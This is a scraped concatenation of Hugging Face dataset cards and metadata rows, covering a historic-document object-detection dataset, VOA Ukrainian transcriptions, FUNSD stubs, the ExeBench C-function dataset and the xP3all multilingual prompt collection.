"### Supported Tasks and Leaderboards\n\n\n* 'object-detection': This dataset can be used to train a model for object-detection on historic document images.\n\n\nDataset Structure\n-----------------\n\n\nThis dataset has two configurations. These configurations both cover the same data and annotations but provide these annotations in different forms to make it easier to integrate the data with existing processing pipelines.\n\n\n* The first configuration, 'YOLO', uses the data's original format.\n* The second configuration converts the YOLO format into a format which is closer to the 'COCO' annotation format. This is done to make it easier to work with the 'feature\\_extractor's from the 'Transformers' models for object detection, which expect data to be in a COCO style format.",
"### Data Instances\n\n\nAn example instance from the COCO config:\n\n\nAn example instance from the YOLO config:",
"### Data Fields\n\n\nThe fields for the YOLO config:\n\n\n* 'image': the image\n* 'objects': the annotations which consist of:\n\t+ 'bbox': a list of bounding boxes for the image\n\t+ 'label': a list of labels for this image\n\n\nThe fields for the COCO config:\n\n\n* 'height': height of the image\n* 'width': width of the image\n* 'image': image\n* 'image\\_id': id for the image\n* 'objects': annotations in COCO format, consisting of a list containing dictionaries with the following keys:\n\t+ 'bbox': bounding boxes for the images\n\t+ 'category\\_id': a label for the image\n\t+ 'image\\_id': id for the image\n\t+ 'iscrowd': COCO 'iscrowd' flag\n\t+ 'segmentation': COCO segmentation annotations (empty in this case but kept for compatibility with other processing scripts)",
"### Data Splits\n\n\nThe dataset contains a train, validation and test split with the following numbers per split:\n\n\n\nDataset Creation\n----------------\n\n\n\n> \n> [this] dataset was produced using a single source, the Lectaurep Repertoires dataset [Rostaing et al., 2021], which served as a basis for only the training and development split. The testset is composed of original data, from various documents, from the 17th century up to the early 20th with a single soldier war report. The test set is voluntarily very different and out of domain with column borders that are not drawn nor printed in certain cases, layout in some kind of masonry layout. p.8\n> .\n> \n> \n>",
"### Curation Rationale\n\n\nThis dataset was created to produce a simplified version of the Lectaurep Repertoires dataset, which was found to contain:\n\n\n\n> \n> around 16 different ways to describe columns, from Col1 to Col7, the case-different col1-col7 and finally ColPair and ColOdd, which we all reduced to Col p.8\n> \n> \n>",
"### Source Data",
"#### Initial Data Collection and Normalization\n\n\nThe LECTAUREP (LECTure Automatique de REPertoires) project, which began in 2018, is a joint initiative of the Minutier central des notaires de Paris, the National Archives and the\nMinutier central des notaires de Paris of the National Archives, the ALMAnaCH (Automatic Language Modeling and Analysis & Computational Humanities) team at Inria and the EPHE (Ecole Pratique des Hautes Etudes), in partnership with the Ministry of Culture.\n\n\n\n> \n> The lectaurep-bronod corpus brings together 100 pages from the repertoire of Maître Louis Bronod (1719-1765), notary in Paris from December 13, 1719 to July 23, 1765. The pages concerned were written during the years 1742 to 1745.\n> \n> \n>",
"#### Who are the source language producers?\n\n\n[More information needed]",
"### Annotations",
"#### Annotation process\n\n\n[More information needed]",
"#### Who are the annotators?\n\n\n[More information needed]",
"### Personal and Sensitive Information\n\n\nThis data does not contain information relating to living individuals.\n\n\nConsiderations for Using the Data\n---------------------------------",
"### Social Impact of Dataset\n\n\nA growing number of datasets are related to page layout for historical documents. This dataset offers a different approach to annotating these datasets (focusing on object detection rather than pixel-level annotations). Improving document layout recognition can have a positive impact on downstream tasks, in particular Optical Character Recognition.",
"### Discussion of Biases\n\n\nHistorical documents contain a wide variety of page layouts. This means that the ability of models trained on this dataset to transfer to documents with very different layouts is not guaranteed.",
"### Other Known Limitations\n\n\n[More information needed]\n\n\nAdditional Information\n----------------------",
"### Dataset Curators",
"### Licensing Information\n\n\nCreative Commons Attribution 4.0 International\n\n\n.
Usage:
```python
from datasets import load_dataset
ds = load_dataset('Yehor/voa-uk-transcriptions', split='train')
for row in ds:
print(row['text'])
```
| Yehor/voa-uk-transcriptions | [
"language:uk",
"license:cc-by-4.0",
"region:us"
] | 2022-07-30T10:59:07+00:00 | {"language": ["uk"], "license": "cc-by-4.0"} | 2022-09-10T09:07:34+00:00 | [] | [
"uk"
] | TAGS
#language-Ukrainian #license-cc-by-4.0 #region-us
|
This repository contains transcriptions with other metadata for the VOA Ukrainian dataset (~398h).
Usage:
| [] | [
"TAGS\n#language-Ukrainian #license-cc-by-4.0 #region-us \n"
] |
1c0214d65571139d86b310eadb2e6615be0df374 | FUNSD dataset | JetsonEarth/jet_funsd | [
"region:us"
] | 2022-07-30T13:38:48+00:00 | {} | 2022-07-30T13:49:35+00:00 | [] | [] | TAGS
#region-us
| FUNSD dataset | [] | [
"TAGS\n#region-us \n"
] |
50b19f4267f1528ffa926fe0112935d5bdf17597 | FUNSD | JetsonEarth/jetson_funsd | [
"region:us"
] | 2022-07-30T14:25:09+00:00 | {} | 2022-07-30T14:28:55+00:00 | [] | [] | TAGS
#region-us
| FUNSD | [] | [
"TAGS\n#region-us \n"
] |
093085f8558cfd53de8e2c8f4ccc7b9e73dc22ae | # ExeBench: an ML-scale dataset of executable C functions
ExeBench is a dataset of millions of C functions paired with dependencies and metadatada such that at least a subset of it can be executed with IO pairs. It is mainly inteded for machine learning applications but it is application-agnostic enough to have other usages.
Please read the paper for more information: https://dl.acm.org/doi/abs/10.1145/3520312.3534867.
Please see `examples/` in https://github.com/jordiae/exebench for examples.
## Usage
### Option 1: Using the helpers in this repo
```
git clone https://github.com/jordiae/exebench.git
cd exebench/
python -m venv venv
source venv/bin/activate
pip install -r requirements_examples.txt
PYTHONPATH="${PYTHONPATH}:${pwd}" python examples/basic.py
```
### Option 2: Directly using the Hugginface Datasets library
```
!pip install datasets zstandard
# Load dataset split. In this case, synthetic test split
dataset = load_dataset('jordiae/exebench', split='test_synth')
for e in dataset:
...
```
### Option 3: Directly download the dataset
Take a look at the files at: https://huggingface.co/datasets/jordiae/exebench/tree/main
The dataset consist of directories compressed with TAR. Inside each TAR, there is a series of jsonline files compressed with zstandard.
## Statistics and versions
This release corresponds to ExeBench v1.01, a version with some improvements with respect to the original one presented in the paper. The statistics and studies presented in the paper remain consistent with respect to the new ones. The final splits of the new version consist of the following functions:
```
train_not_compilable: 2.357M
train_synth_compilable: 2.308373M
train_real_compilable: 0.675074M
train_synth_simple_io: 0.550116M
train_real_simple_io: 0.043769M
train_synth_rich_io: 0.097250M
valid_synth: 5k
valid_real: 2.133k
test_synth: 5k
test_real: 2.134k
```
The original dataset (v1.00) with the exact same data studied in the paper can be accessed on request at: https://huggingface.co/datasets/jordiae/exebench_legacy (please reach out for access)
## License
All C functions keep the original license as per their original Github repository (available in the metadata). All ExeBench contributions (I/O examples, boilerplate to run functions, etc) are released with an MIT license.
## Citation
```
@inproceedings{10.1145/3520312.3534867,
author = {Armengol-Estap\'{e}, Jordi and Woodruff, Jackson and Brauckmann, Alexander and Magalh\~{a}es, Jos\'{e} Wesley de Souza and O'Boyle, Michael F. P.},
title = {ExeBench: An ML-Scale Dataset of Executable C Functions},
year = {2022},
isbn = {9781450392730},
publisher = {Association for Computing Machinery},
address = {New York, NY, USA},
url = {https://doi.org/10.1145/3520312.3534867},
doi = {10.1145/3520312.3534867},
abstract = {Machine-learning promises to transform compilation and software engineering, yet is frequently limited by the scope of available datasets. In particular, there is a lack of runnable, real-world datasets required for a range of tasks ranging from neural program synthesis to machine learning-guided program optimization. We introduce a new dataset, ExeBench, which attempts to address this. It tackles two key issues with real-world code: references to external types and functions and scalable generation of IO examples. ExeBench is the first publicly available dataset that pairs real-world C code taken from GitHub with IO examples that allow these programs to be run. We develop a toolchain that scrapes GitHub, analyzes the code, and generates runnable snippets of code. We analyze our benchmark suite using several metrics, and show it is representative of real-world code. ExeBench contains 4.5M compilable and 700k executable C functions. This scale of executable, real functions will enable the next generation of machine learning-based programming tasks.},
booktitle = {Proceedings of the 6th ACM SIGPLAN International Symposium on Machine Programming},
pages = {50–59},
numpages = {10},
keywords = {Code Dataset, Program Synthesis, Mining Software Repositories, C, Machine Learning for Code, Compilers},
location = {San Diego, CA, USA},
series = {MAPS 2022}
}
```
## Credits
We thank Anghabench authors for their type inference-based synthetic dependencies generation for C functions. This software, Psyche-C, can be found at: https://github.com/ltcmelo/psychec
## Contact
```
jordi.armengol.estape at ed.ac.uk
``` | jordiae/exebench | [
"region:us"
] | 2022-07-30T19:07:06+00:00 | {} | 2023-03-09T16:06:06+00:00 | [] | [] | TAGS
#region-us
| # ExeBench: an ML-scale dataset of executable C functions
ExeBench is a dataset of millions of C functions paired with dependencies and metadatada such that at least a subset of it can be executed with IO pairs. It is mainly inteded for machine learning applications but it is application-agnostic enough to have other usages.
Please read the paper for more information: URL
Please see 'examples/' in URL for examples.
## Usage
### Option 1: Using the helpers in this repo
### Option 2: Directly using the Hugginface Datasets library
### Option 3: Directly download the dataset
Take a look at the files at: URL
The dataset consist of directories compressed with TAR. Inside each TAR, there is a series of jsonline files compressed with zstandard.
## Statistics and versions
This release corresponds to ExeBench v1.01, a version with some improvements with respect to the original one presented in the paper. The statistics and studies presented in the paper remain consistent with respect to the new ones. The final splits of the new version consist of the following functions:
The original dataset (v1.00) with the exact same data studied in the paper can be accessed on request at: URL (please reach out for access)
## License
All C functions keep the original license as per their original Github repository (available in the metadata). All ExeBench contributions (I/O examples, boilerplate to run functions, etc) are released with an MIT license.
## Credits
We thank Anghabench authors for their type inference-based synthetic dependencies generation for C functions. This software, Psyche-C, can be found at: URL
## Contact
| [
"# ExeBench: an ML-scale dataset of executable C functions\n\nExeBench is a dataset of millions of C functions paired with dependencies and metadatada such that at least a subset of it can be executed with IO pairs. It is mainly inteded for machine learning applications but it is application-agnostic enough to have other usages.\nPlease read the paper for more information: URL\nPlease see 'examples/' in URL for examples.",
"## Usage",
"### Option 1: Using the helpers in this repo",
"### Option 2: Directly using the Hugginface Datasets library",
"### Option 3: Directly download the dataset\n\nTake a look at the files at: URL\nThe dataset consist of directories compressed with TAR. Inside each TAR, there is a series of jsonline files compressed with zstandard.",
"## Statistics and versions\n\nThis release corresponds to ExeBench v1.01, a version with some improvements with respect to the original one presented in the paper. The statistics and studies presented in the paper remain consistent with respect to the new ones. The final splits of the new version consist of the following functions:\n\n\n\n\nThe original dataset (v1.00) with the exact same data studied in the paper can be accessed on request at: URL (please reach out for access)",
"## License\n\nAll C functions keep the original license as per their original Github repository (available in the metadata). All ExeBench contributions (I/O examples, boilerplate to run functions, etc) are released with an MIT license.",
"## Credits\n\nWe thank Anghabench authors for their type inference-based synthetic dependencies generation for C functions. This software, Psyche-C, can be found at: URL",
"## Contact"
] | [
"TAGS\n#region-us \n",
"# ExeBench: an ML-scale dataset of executable C functions\n\nExeBench is a dataset of millions of C functions paired with dependencies and metadatada such that at least a subset of it can be executed with IO pairs. It is mainly inteded for machine learning applications but it is application-agnostic enough to have other usages.\nPlease read the paper for more information: URL\nPlease see 'examples/' in URL for examples.",
"## Usage",
"### Option 1: Using the helpers in this repo",
"### Option 2: Directly using the Hugginface Datasets library",
"### Option 3: Directly download the dataset\n\nTake a look at the files at: URL\nThe dataset consist of directories compressed with TAR. Inside each TAR, there is a series of jsonline files compressed with zstandard.",
"## Statistics and versions\n\nThis release corresponds to ExeBench v1.01, a version with some improvements with respect to the original one presented in the paper. The statistics and studies presented in the paper remain consistent with respect to the new ones. The final splits of the new version consist of the following functions:\n\n\n\n\nThe original dataset (v1.00) with the exact same data studied in the paper can be accessed on request at: URL (please reach out for access)",
"## License\n\nAll C functions keep the original license as per their original Github repository (available in the metadata). All ExeBench contributions (I/O examples, boilerplate to run functions, etc) are released with an MIT license.",
"## Credits\n\nWe thank Anghabench authors for their type inference-based synthetic dependencies generation for C functions. This software, Psyche-C, can be found at: URL",
"## Contact"
] |
d2bde405fafdd53aa4f92ddf03b14a7e7533d660 |
# Dataset Card for xP3
## Table of Contents
- [Table of Contents](#table-of-contents)
- [Dataset Description](#dataset-description)
- [Dataset Summary](#dataset-summary)
- [Supported Tasks and Leaderboards](#supported-tasks-and-leaderboards)
- [Languages](#languages)
- [Dataset Structure](#dataset-structure)
- [Data Instances](#data-instances)
- [Data Fields](#data-fields)
- [Data Splits](#data-splits)
- [Dataset Creation](#dataset-creation)
- [Curation Rationale](#curation-rationale)
- [Source Data](#source-data)
- [Annotations](#annotations)
- [Additional Information](#additional-information)
- [Licensing Information](#licensing-information)
- [Citation Information](#citation-information)
- [Contributions](#contributions)
## Dataset Description
- **Repository:** https://github.com/bigscience-workshop/xmtf
- **Paper:** [Crosslingual Generalization through Multitask Finetuning](https://arxiv.org/abs/2211.01786)
- **Point of Contact:** [Niklas Muennighoff](mailto:[email protected])
### Dataset Summary
> xP3 (Crosslingual Public Pool of Prompts) is a collection of prompts & datasets across 46 of languages & 16 NLP tasks. It is used for the training of BLOOMZ and mT0, multilingual language models capable of following human instructions in dozens of languages zero-shot.
- **Creation:** The dataset can be recreated using instructions available [here](https://github.com/bigscience-workshop/xmtf#create-xp3). We provide this version to save processing time and ease reproducibility.
- **Languages:** 46 (Can be extended by [recreating with more splits](https://github.com/bigscience-workshop/xmtf#create-xp3))
- **xP3 Dataset Family:**
<table>
<tr>
<th>Name</th>
<th>Explanation</th>
<th>Example models</th>
</tr>
<tr>
<td><a href=https://huggingface.co/datasets/Muennighoff/xP3x>xP3x</a></t>
<td>Mixture of 17 tasks in 277 languages with English prompts</td>
<td>WIP - Join us at Project Aya @<a href=https://cohere.for.ai/>C4AI</a> to help!</td>
</tr>
<tr>
<td><a href=https://huggingface.co/datasets/bigscience/xP3>xP3</a></t>
<td>Mixture of 13 training tasks in 46 languages with English prompts</td>
<td><a href=https://huggingface.co/bigscience/bloomz>bloomz</a> & <a href=https://huggingface.co/bigscience/mt0-xxl>mt0-xxl</a></td>
</tr>
<tr>
<td><a href=https://huggingface.co/datasets/bigscience/xP3mt>xP3mt</a></t>
<td>Mixture of 13 training tasks in 46 languages with prompts in 20 languages (machine-translated from English)</td>
<td><a href=https://huggingface.co/bigscience/bloomz-mt>bloomz-mt</a> & <a href=https://huggingface.co/bigscience/mt0-xxl-mt>mt0-xxl-mt</a></td>
</tr>
<tr>
<td><a href=https://huggingface.co/datasets/bigscience/xP3all>xP3all</a></t>
<td>xP3 + evaluation datasets adding an additional 3 tasks for a total of 16 tasks in 46 languages with English prompts</td>
<td></td>
</tr>
<tr>
<td><a href=https://huggingface.co/datasets/bigscience/xP3megds>xP3megds</a></t>
<td><a href=https://github.com/bigscience-workshop/Megatron-DeepSpeed>Megatron-DeepSpeed</a> processed version of xP3</td>
<td><a href=https://huggingface.co/bigscience/bloomz>bloomz</a></td>
</tr>
<tr>
<td><a href=https://huggingface.co/datasets/Muennighoff/P3>P3</a></t>
<td>Repreprocessed version of the English-only <a href=https://huggingface.co/datasets/bigscience/P3>P3</a> with 8 training tasks</td>
<td><a href=https://huggingface.co/bigscience/bloomz-p3>bloomz-p3</a> & <a href=https://huggingface.co/bigscience/mt0-xxl-p3>mt0-xxl-p3</a></td>
</tr>
</table>
## Dataset Structure
### Data Instances
An example of "train" looks as follows:
```json
{
"inputs": "Sentence 1: Fue académico en literatura metafísica, teología y ciencias clásicas.\nSentence 2: Fue académico en literatura metafísica, teología y ciencia clásica.\nQuestion: Can we rewrite Sentence 1 to Sentence 2? Yes or No?",
"targets": "Yes"
}
```
### Data Fields
The data fields are the same among all splits:
- `inputs`: the natural language input fed to the model
- `targets`: the natural language target that the model has to generate
### Data Splits
The below table summarizes sizes per language (computed from the `merged_{lang}.jsonl` files). Due to languages like `tw` only being single sentence translation samples from Flores, their byte percentage is significantly lower than their sample percentage.
|Language|Kilobytes|%|Samples|%|
|--------|------:|-:|---:|-:|
|tw|106288|0.11|265071|0.33|
|bm|107056|0.11|265180|0.33|
|ak|108096|0.11|265071|0.33|
|ca|110608|0.11|271191|0.33|
|eu|113008|0.11|281199|0.35|
|fon|113072|0.11|265063|0.33|
|st|114080|0.11|265063|0.33|
|ki|115040|0.12|265180|0.33|
|tum|116032|0.12|265063|0.33|
|wo|122560|0.12|365063|0.45|
|ln|126304|0.13|365060|0.45|
|as|156256|0.16|265063|0.33|
|or|161472|0.16|265063|0.33|
|kn|165456|0.17|265063|0.33|
|ml|175040|0.18|265864|0.33|
|rn|192992|0.19|318189|0.39|
|nso|229712|0.23|915051|1.13|
|tn|235536|0.24|915054|1.13|
|lg|235936|0.24|915021|1.13|
|rw|249360|0.25|915043|1.13|
|ts|250256|0.25|915044|1.13|
|sn|252496|0.25|865056|1.07|
|xh|254672|0.26|915058|1.13|
|zu|263712|0.26|915061|1.13|
|ny|272128|0.27|915063|1.13|
|ig|325232|0.33|950097|1.17|
|yo|352784|0.35|918416|1.13|
|ne|393680|0.39|315754|0.39|
|pa|523248|0.52|339210|0.42|
|gu|560688|0.56|347499|0.43|
|sw|566656|0.57|1130481|1.4|
|mr|666240|0.67|417269|0.52|
|bn|832720|0.83|428843|0.53|
|ta|926912|0.93|415433|0.51|
|te|1343232|1.35|584590|0.72|
|ur|1918272|1.92|855756|1.06|
|vi|3102512|3.11|1672106|2.07|
|code|4330752|4.34|2707724|3.34|
|hi|4403568|4.41|1554667|1.92|
|zh|4599440|4.61|3589234|4.43|
|id|4612256|4.62|2643418|3.27|
|ar|4683456|4.69|2160181|2.67|
|fr|6591120|6.6|5316403|6.57|
|pt|6886800|6.9|3752156|4.63|
|es|8587920|8.6|5413205|6.69|
|en|39252528|39.33|32740750|40.44|
|total|99807184|100.0|80956089|100.0|
## Dataset Creation
### Source Data
#### Training datasets
- Code Miscellaneous
- [CodeComplex](https://huggingface.co/datasets/codeparrot/codecomplex)
- [Docstring Corpus](https://huggingface.co/datasets/teven/code_docstring_corpus)
- [GreatCode](https://huggingface.co/datasets/great_code)
- [State Changes](https://huggingface.co/datasets/Fraser/python-state-changes)
- Closed-book QA
- [Hotpot QA](https://huggingface.co/datasets/hotpot_qa)
- [Trivia QA](https://huggingface.co/datasets/trivia_qa)
- [Web Questions](https://huggingface.co/datasets/web_questions)
- [Wiki QA](https://huggingface.co/datasets/wiki_qa)
- Extractive QA
- [Adversarial QA](https://huggingface.co/datasets/adversarial_qa)
- [CMRC2018](https://huggingface.co/datasets/cmrc2018)
- [DRCD](https://huggingface.co/datasets/clue)
- [DuoRC](https://huggingface.co/datasets/duorc)
- [MLQA](https://huggingface.co/datasets/mlqa)
- [Quoref](https://huggingface.co/datasets/quoref)
- [ReCoRD](https://huggingface.co/datasets/super_glue)
- [ROPES](https://huggingface.co/datasets/ropes)
- [SQuAD v2](https://huggingface.co/datasets/squad_v2)
- [xQuAD](https://huggingface.co/datasets/xquad)
- TyDI QA
- [Primary](https://huggingface.co/datasets/khalidalt/tydiqa-primary)
- [Goldp](https://huggingface.co/datasets/khalidalt/tydiqa-goldp)
- Multiple-Choice QA
- [ARC](https://huggingface.co/datasets/ai2_arc)
- [C3](https://huggingface.co/datasets/c3)
- [CoS-E](https://huggingface.co/datasets/cos_e)
- [Cosmos](https://huggingface.co/datasets/cosmos)
- [DREAM](https://huggingface.co/datasets/dream)
- [MultiRC](https://huggingface.co/datasets/super_glue)
- [OpenBookQA](https://huggingface.co/datasets/openbookqa)
- [PiQA](https://huggingface.co/datasets/piqa)
- [QUAIL](https://huggingface.co/datasets/quail)
- [QuaRel](https://huggingface.co/datasets/quarel)
- [QuaRTz](https://huggingface.co/datasets/quartz)
- [QASC](https://huggingface.co/datasets/qasc)
- [RACE](https://huggingface.co/datasets/race)
- [SciQ](https://huggingface.co/datasets/sciq)
- [Social IQA](https://huggingface.co/datasets/social_i_qa)
- [Wiki Hop](https://huggingface.co/datasets/wiki_hop)
- [WiQA](https://huggingface.co/datasets/wiqa)
- Paraphrase Identification
- [MRPC](https://huggingface.co/datasets/super_glue)
- [PAWS](https://huggingface.co/datasets/paws)
- [PAWS-X](https://huggingface.co/datasets/paws-x)
- [QQP](https://huggingface.co/datasets/qqp)
- Program Synthesis
- [APPS](https://huggingface.co/datasets/codeparrot/apps)
- [CodeContests](https://huggingface.co/datasets/teven/code_contests)
- [JupyterCodePairs](https://huggingface.co/datasets/codeparrot/github-jupyter-text-code-pairs)
- [MBPP](https://huggingface.co/datasets/Muennighoff/mbpp)
- [NeuralCodeSearch](https://huggingface.co/datasets/neural_code_search)
- [XLCoST](https://huggingface.co/datasets/codeparrot/xlcost-text-to-code)
- Structure-to-text
- [Common Gen](https://huggingface.co/datasets/common_gen)
- [Wiki Bio](https://huggingface.co/datasets/wiki_bio)
- Sentiment
- [Amazon](https://huggingface.co/datasets/amazon_polarity)
- [App Reviews](https://huggingface.co/datasets/app_reviews)
- [IMDB](https://huggingface.co/datasets/imdb)
- [Rotten Tomatoes](https://huggingface.co/datasets/rotten_tomatoes)
- [Yelp](https://huggingface.co/datasets/yelp_review_full)
- Simplification
- [BiSECT](https://huggingface.co/datasets/GEM/BiSECT)
- Summarization
- [CNN Daily Mail](https://huggingface.co/datasets/cnn_dailymail)
- [Gigaword](https://huggingface.co/datasets/gigaword)
- [MultiNews](https://huggingface.co/datasets/multi_news)
- [SamSum](https://huggingface.co/datasets/samsum)
- [Wiki-Lingua](https://huggingface.co/datasets/GEM/wiki_lingua)
- [XLSum](https://huggingface.co/datasets/GEM/xlsum)
- [XSum](https://huggingface.co/datasets/xsum)
- Topic Classification
- [AG News](https://huggingface.co/datasets/ag_news)
- [DBPedia](https://huggingface.co/datasets/dbpedia_14)
- [TNEWS](https://huggingface.co/datasets/clue)
- [TREC](https://huggingface.co/datasets/trec)
- [CSL](https://huggingface.co/datasets/clue)
- Translation
- [Flores-200](https://huggingface.co/datasets/Muennighoff/flores200)
- [Tatoeba](https://huggingface.co/datasets/Helsinki-NLP/tatoeba_mt)
- Word Sense disambiguation
- [WiC](https://huggingface.co/datasets/super_glue)
- [XL-WiC](https://huggingface.co/datasets/pasinit/xlwic)
#### Evaluation datasets (included in [xP3all](https://huggingface.co/datasets/bigscience/xP3all) except for HumanEval)
- Natural Language Inference
- [ANLI](https://huggingface.co/datasets/anli)
- [CB](https://huggingface.co/datasets/super_glue)
- [RTE](https://huggingface.co/datasets/super_glue)
- [XNLI](https://huggingface.co/datasets/xnli)
- Coreference Resolution
- [Winogrande](https://huggingface.co/datasets/winogrande)
- [XWinograd](https://huggingface.co/datasets/Muennighoff/xwinograd)
- Program Synthesis
- [HumanEval](https://huggingface.co/datasets/openai_humaneval)
- Sentence Completion
- [COPA](https://huggingface.co/datasets/super_glue)
- [Story Cloze](https://huggingface.co/datasets/story_cloze)
- [XCOPA](https://huggingface.co/datasets/xcopa)
- [XStoryCloze](https://huggingface.co/datasets/Muennighoff/xstory_cloze)
#### Additional [xP3all](https://huggingface.co/datasets/bigscience/xP3all) datasets
- Coreference Resolution
- [WSC (Fixed)](https://huggingface.co/datasets/super_glue)
- Sentence Completion
- [HellaSwag](https://huggingface.co/datasets/hellaswag)
- Translation
- [MultiEurlex](https://huggingface.co/datasets/multi_eurlex)
## Additional Information
### Licensing Information
The dataset is released under Apache 2.0.
### Citation Information
```bibtex
@misc{muennighoff2022crosslingual,
title={Crosslingual Generalization through Multitask Finetuning},
author={Niklas Muennighoff and Thomas Wang and Lintang Sutawika and Adam Roberts and Stella Biderman and Teven Le Scao and M Saiful Bari and Sheng Shen and Zheng-Xin Yong and Hailey Schoelkopf and Xiangru Tang and Dragomir Radev and Alham Fikri Aji and Khalid Almubarak and Samuel Albanie and Zaid Alyafeai and Albert Webson and Edward Raff and Colin Raffel},
year={2022},
eprint={2211.01786},
archivePrefix={arXiv},
primaryClass={cs.CL}
}
```
### Contributions
Thanks to the contributors of [promptsource](https://github.com/bigscience-workshop/promptsource/graphs/contributors) for adding many prompts used in this dataset. | bigscience/xP3all | [
"task_categories:other",
"annotations_creators:expert-generated",
"annotations_creators:crowdsourced",
"multilinguality:multilingual",
"size_categories:100M<n<1B",
"language:ak",
"language:ar",
"language:as",
"language:bm",
"language:bn",
"language:ca",
"language:code",
"language:en",
"language:es",
"language:eu",
"language:fon",
"language:fr",
"language:gu",
"language:hi",
"language:id",
"language:ig",
"language:ki",
"language:kn",
"language:lg",
"language:ln",
"language:ml",
"language:mr",
"language:ne",
"language:nso",
"language:ny",
"language:or",
"language:pa",
"language:pt",
"language:rn",
"language:rw",
"language:sn",
"language:st",
"language:sw",
"language:ta",
"language:te",
"language:tn",
"language:ts",
"language:tum",
"language:tw",
"language:ur",
"language:vi",
"language:wo",
"language:xh",
"language:yo",
"language:zh",
"language:zu",
"license:apache-2.0",
"arxiv:2211.01786",
"region:us"
] | 2022-07-30T20:05:02+00:00 | {"annotations_creators": ["expert-generated", "crowdsourced"], "language": ["ak", "ar", "as", "bm", "bn", "ca", "code", "en", "es", "eu", "fon", "fr", "gu", "hi", "id", "ig", "ki", "kn", "lg", "ln", "ml", "mr", "ne", "nso", "ny", "or", "pa", "pt", "rn", "rw", "sn", "st", "sw", "ta", "te", "tn", "ts", "tum", "tw", "ur", "vi", "wo", "xh", "yo", "zh", "zu"], "license": ["apache-2.0"], "multilinguality": ["multilingual"], "size_categories": ["100M<n<1B"], "task_categories": ["other"], "pretty_name": "xP3", "programming_language": ["C", "C++", "C#", "Go", "Java", "JavaScript", "Lua", "PHP", "Python", "Ruby", "Rust", "Scala", "TypeScript"]} | 2023-05-30T14:51:40+00:00 | [
"2211.01786"
] | [
"ak",
"ar",
"as",
"bm",
"bn",
"ca",
"code",
"en",
"es",
"eu",
"fon",
"fr",
"gu",
"hi",
"id",
"ig",
"ki",
"kn",
"lg",
"ln",
"ml",
"mr",
"ne",
"nso",
"ny",
"or",
"pa",
"pt",
"rn",
"rw",
"sn",
"st",
"sw",
"ta",
"te",
"tn",
"ts",
"tum",
"tw",
"ur",
"vi",
"wo",
"xh",
"yo",
"zh",
"zu"
] | TAGS
#task_categories-other #annotations_creators-expert-generated #annotations_creators-crowdsourced #multilinguality-multilingual #size_categories-100M<n<1B #language-Akan #language-Arabic #language-Assamese #language-Bambara #language-Bengali #language-Catalan #language-code #language-English #language-Spanish #language-Basque #language-Fon #language-French #language-Gujarati #language-Hindi #language-Indonesian #language-Igbo #language-Kikuyu #language-Kannada #language-Ganda #language-Lingala #language-Malayalam #language-Marathi #language-Nepali (macrolanguage) #language-Pedi #language-Nyanja #language-Oriya (macrolanguage) #language-Panjabi #language-Portuguese #language-Rundi #language-Kinyarwanda #language-Shona #language-Southern Sotho #language-Swahili (macrolanguage) #language-Tamil #language-Telugu #language-Tswana #language-Tsonga #language-Tumbuka #language-Twi #language-Urdu #language-Vietnamese #language-Wolof #language-Xhosa #language-Yoruba #language-Chinese #language-Zulu #license-apache-2.0 #arxiv-2211.01786 #region-us
| Dataset Card for xP3
====================
Table of Contents
-----------------
* Table of Contents
* Dataset Description
+ Dataset Summary
+ Supported Tasks and Leaderboards
+ Languages
* Dataset Structure
+ Data Instances
+ Data Fields
+ Data Splits
* Dataset Creation
+ Curation Rationale
+ Source Data
+ Annotations
* Additional Information
+ Licensing Information
+ Citation Information
+ Contributions
Dataset Description
-------------------
* Repository: URL
* Paper: Crosslingual Generalization through Multitask Finetuning
* Point of Contact: Niklas Muennighoff
### Dataset Summary
>
> xP3 (Crosslingual Public Pool of Prompts) is a collection of prompts & datasets across 46 of languages & 16 NLP tasks. It is used for the training of BLOOMZ and mT0, multilingual language models capable of following human instructions in dozens of languages zero-shot.
>
>
>
* Creation: The dataset can be recreated using instructions available here. We provide this version to save processing time and ease reproducibility.
* Languages: 46 (Can be extended by recreating with more splits)
* xP3 Dataset Family:
Dataset Structure
-----------------
### Data Instances
An example of "train" looks as follows:
### Data Fields
The data fields are the same among all splits:
* 'inputs': the natural language input fed to the model
* 'targets': the natural language target that the model has to generate
### Data Splits
The below table summarizes sizes per language (computed from the 'merged\_{lang}.jsonl' files). Due to languages like 'tw' only being single sentence translation samples from Flores, their byte percentage is significantly lower than their sample percentage.
Dataset Creation
----------------
### Source Data
#### Training datasets
* Code Miscellaneous
+ CodeComplex
+ Docstring Corpus
+ GreatCode
+ State Changes
* Closed-book QA
+ Hotpot QA
+ Trivia QA
+ Web Questions
+ Wiki QA
* Extractive QA
+ Adversarial QA
+ CMRC2018
+ DRCD
+ DuoRC
+ MLQA
+ Quoref
+ ReCoRD
+ ROPES
+ SQuAD v2
+ xQuAD
